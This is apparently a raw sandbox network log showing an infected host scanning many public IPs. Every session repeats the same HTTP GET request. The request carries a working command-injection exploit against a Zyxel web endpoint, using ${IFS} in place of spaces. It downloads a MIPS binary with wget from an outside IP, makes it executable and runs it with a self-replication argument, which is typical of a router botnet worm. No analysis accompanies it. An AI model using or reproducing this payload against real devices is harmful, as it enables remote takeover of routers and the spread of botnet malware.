                                                        Feb 2, 2024 06:21:04.833415031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3161192.168.2.143964484.116.55.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833445072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3162192.168.2.1458498111.247.182.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833502054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3163192.168.2.1440500161.143.9.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833523989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3164192.168.2.144609880.10.53.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833566904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3165192.168.2.144184080.193.173.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833612919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3166192.168.2.144409696.132.155.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833641052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3167192.168.2.143483885.182.186.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833713055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3168192.168.2.144904486.107.185.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833741903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3169192.168.2.143588423.177.206.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833781958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3170192.168.2.1441490203.140.7.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833821058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3171192.168.2.1456734158.176.218.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833867073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3172192.168.2.145957880.202.85.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833892107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3173192.168.2.143360046.136.69.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833925009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3174192.168.2.143298841.5.32.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833967924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3175192.168.2.1460620196.32.176.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834007025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3176192.168.2.144133841.197.8.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834054947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3177192.168.2.1452578109.50.221.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834096909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3178192.168.2.144684827.165.125.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834101915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3179192.168.2.1440740106.137.236.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834153891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3180192.168.2.1458342116.39.122.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834204912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3181192.168.2.1432944195.44.53.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834228992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3182192.168.2.1434364119.48.211.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834285975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3183192.168.2.1438728217.212.183.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834317923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3184192.168.2.1444672189.147.213.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834353924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3185192.168.2.145043490.31.20.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834376097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3186192.168.2.143454085.191.134.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834431887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3187192.168.2.143389248.206.177.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834454060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3188192.168.2.1447808207.116.231.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834502935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3189192.168.2.144131043.39.121.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834531069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3190192.168.2.1444410179.12.112.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834574938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3191192.168.2.145212657.191.123.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834610939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192192.168.2.1460344156.209.10.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834642887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3193192.168.2.144817267.146.144.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834661961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3194192.168.2.144457650.251.174.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834682941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3195192.168.2.1448794101.139.229.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834723949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3196192.168.2.146022878.177.238.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834757090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3197192.168.2.1454752187.209.233.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834810972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3198192.168.2.1452962205.235.186.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834855080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3199192.168.2.1459428216.7.121.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834887028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3200192.168.2.1440454151.162.38.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834916115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3201192.168.2.1452812149.152.182.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834952116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3202192.168.2.145253843.46.80.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.834995031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3203192.168.2.145671264.147.166.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835019112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3204192.168.2.1460828197.76.204.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835051060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3205192.168.2.1452696160.45.238.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835082054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3206192.168.2.143499034.72.174.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835136890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3207192.168.2.1434202175.26.61.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835186958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3208192.168.2.143480868.240.216.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835208893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3209192.168.2.143318048.175.47.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835275888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3210192.168.2.1454120203.162.67.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835299015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3211192.168.2.1455896133.139.225.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835326910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3212192.168.2.1442914191.200.232.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835369110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3213192.168.2.143961814.112.30.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835398912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3214192.168.2.1447022196.122.191.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835431099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3215192.168.2.143765895.229.99.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835537910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3216192.168.2.145369890.16.157.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835587978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3217192.168.2.1451140174.106.212.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835633993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3218192.168.2.143289241.204.52.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835649014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3219192.168.2.144405659.109.40.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835692883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3220192.168.2.1459996193.218.96.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835741997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3221192.168.2.1443994191.98.212.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835793018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3222192.168.2.145871292.68.126.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835803032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3223192.168.2.1453896110.6.85.131443
                                                        TimestampBytes transferredDirectionData
